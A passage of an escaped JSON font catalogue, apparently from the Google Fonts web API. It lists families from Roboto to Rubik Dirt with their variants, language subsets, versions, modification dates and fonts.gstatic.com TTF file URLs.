\"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5vAx05IsDqlA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TjARc9AMX6lJBP.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Me5WZLCzYlKw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/roboto/v30/KFOkCnqEu92Fr1Mu52xPKTM1K9nz.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmEU9vAx05IsDqlA.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51S7ABc9AMX6lJBP.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAx05IsDqlA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TzBhc9AMX6lJBP.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmYUtvAx05IsDqlA.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/roboto/v30/KFOjCnqEu92Fr1Mu51TLBBc9AMX6lJBP.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Roboto Condensed\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-33mZKCMSbvtdYyQ.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/robotocondensed/v25/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDpCEYatlYcyRi4A.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/robotocondensed/v25/ieVl2ZhZI2eCN5jzbjEETS9weq8-59WxDCs5cvI.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/robotocondensed/v25/ieVj2ZhZI2eCN5jzbjEETS9weq8-19e7CAk8YvJEeg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-32meKCMSbvtdYyQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/robotocondensed/v25/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDtCYYatlYcyRi4A.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Roboto Flex\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/robotoflex/v9/NaN4epOXO_NexZs0b5QrzlOHb8wCikXpYqmZsWI-__OGfttPZktqc2VdZ80KvCLZaPcSBZtOx2MifRuWR28sPJtUMbsFEK6cRrleUx9Xgbm3WLHa_F4Ep4Fm0PN19Ik5Dntczx0wZGzhPlL1YNMYKbv9_1IQXOw7AiUJVXpRJ6cXW4O8TNGoXjC79QRyaLshNDUf3e0O-gn5rrZCu20YNYG0EACUTNK-QKavMlxGIY8dxef0jQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Roboto Mono\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vuPQ--5Ip2sSQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_XvqPQ--5Ip2sSQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_gPqPQ--5Ip2sSQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vqPQ--5Ip2sSQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_7PqPQ--5Ip2sSQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_AP2PQ--5Ip2sSQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_Of2PQ--5Ip2sSQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnAeW9AJi8SZwt.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrnnAOW9AJi8SZwt.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrk5AOW9AJi8SZwt.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnAOW9AJi8SZwt.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlVAOW9AJi8SZwt.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrm5B-W9AJi8SZwt.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrmAB-W9AJi8SZwt.ttf\"\n      },\n      \"category\": \"monospace\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Roboto Serif\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v8\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEliosp6d2Af5fR4k.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElqotp6d2Af5fR4k.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElnQtp6d2Af5fR4k.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEliotp6d2Af5fR4k.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElhgtp6d2Af5fR4k.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElvQqp6d2Af5fR4k.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEls0qp6d2Af5fR4k.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElqoqp6d2Af5fR4k.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEloMqp6d2Af5fR4k.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuT-V8BdxaV4nUFw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-Juz-R8BdxaV4nUFw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuEeR8BdxaV4nUFw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuT-R8BdxaV4nUFw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JufeR8BdxaV4nUFw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JukeN8BdxaV4nUFw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuqON8BdxaV4nUFw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-Juz-N8BdxaV4nUFw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-Ju5uN8BdxaV4nUFw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Roboto Slab\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojIWWaG5iddG-1A.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDISWaG5iddG-1A.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjo0oSWaG5iddG-1A.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojISWaG5iddG-1A.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjovoSWaG5iddG-1A.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoUoOWaG5iddG-1A.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoa4OWaG5iddG-1A.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDIOWaG5iddG-1A.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoJYOWaG5iddG-1A.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rochester\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rochester/v18/6ae-4KCqVa4Zy6Fif-Uy31vWNTMwoQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rock Salt\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rocksalt/v18/MwQ0bhv11fWD6QsAVOZbsEk7hbBWrA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"RocknRoll One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rocknrollone/v10/kmK7ZqspGAfCeUiW6FFlmEC9guVhs7tfUxc.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rokkitt\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v29\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1rydpDLE76HvN6n.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pyd5DLE76HvN6n.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1qsd5DLE76HvN6n.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1ryd5DLE76HvN6n.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1rAd5DLE76HvN6n.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1oscJDLE76HvN6n.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1oVcJDLE76HvN6n.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pycJDLE76HvN6n.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pbcJDLE76HvN6n.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Romanesco\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/romanesco/v21/w8gYH2ozQOY7_r_J7mSn3HwLqOqSBg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ropa Sans\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ropasans/v15/EYqxmaNOzLlWtsZSScyKWjloU5KP2g.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/ropasans/v15/EYq3maNOzLlWtsZSScy6WDNscZef2mNE.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rosario\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM69GCWczd-YnOzUD.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM68YCWczd-YnOzUD.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM68qCWczd-YnOzUD.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM6_GDmczd-YnOzUD.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM6__Dmczd-YnOzUD.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQStFwfeIFPiUDn08.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSo9wfeIFPiUDn08.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSr1wfeIFPiUDn08.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSlF3feIFPiUDn08.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSmh3feIFPiUDn08.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rosarivo\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rosarivo/v20/PlI-Fl2lO6N9f8HaNAeC2nhMnNy5.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/rosarivo/v20/PlI4Fl2lO6N9f8HaNDeA0Hxumcy5ZX8.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rouge Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rougescript/v14/LYjFdGbiklMoCIQOw1Ep3S4PVPXbUJWq9g.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rowdies\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/rowdies/v15/ptRMTieMYPNBAK219hth5O7yKQNute8.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/rowdies/v15/ptRJTieMYPNBAK21zrdJwObZNQo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rowdies/v15/ptRMTieMYPNBAK219gtm5O7yKQNute8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rozha One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rozhaone/v13/AlZy_zVFtYP12Zncg2khdXf4XB0Tow.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/rubik/v23/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-WYi1UE80V4bVkA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/rubik/v23/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4i1UE80V4bVkA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/rubik/v23/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-NYi1UE80V4bVkA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/rubik/v23/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-2Y-1UE80V4bVkA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rubik/v23/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-4I-1UE80V4bVkA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/rubik/v23/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-h4-1UE80V4bVkA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/rubik/v23/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-ro-1UE80V4bVkA.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/rubik/v23/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8sDE0UwdYPFkJ1O.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/rubik/v23/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8tdE0UwdYPFkJ1O.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/rubik/v23/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8tvE0UwdYPFkJ1O.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/rubik/v23/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8uDFEUwdYPFkJ1O.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/rubik/v23/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8u6FEUwdYPFkJ1O.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/rubik/v23/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8vdFEUwdYPFkJ1O.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/rubik/v23/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8v0FEUwdYPFkJ1O.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik 80s Fade\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubik80sfade/v1/U9MF6dW37nLSmnwZXyoV-uPXUhHwkbL8IHcK.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Beastly\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikbeastly/v10/0QImMXRd5oOmSC2ZQ7o9653X07z8_ApHqqk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Bubbles\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikbubbles/v2/JIA1UVdwbHFJtwA7Us1BPFbRNTENfDxyRXI.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Burned\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikburned/v1/Jqzk5TmOVOqQHihKqPpscqniHQuaCY5ZSg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rubik Dirt\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rubikdirt/v1/DtVmJxC7WLEj1uIXEWAdulwm6gDXvwE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": 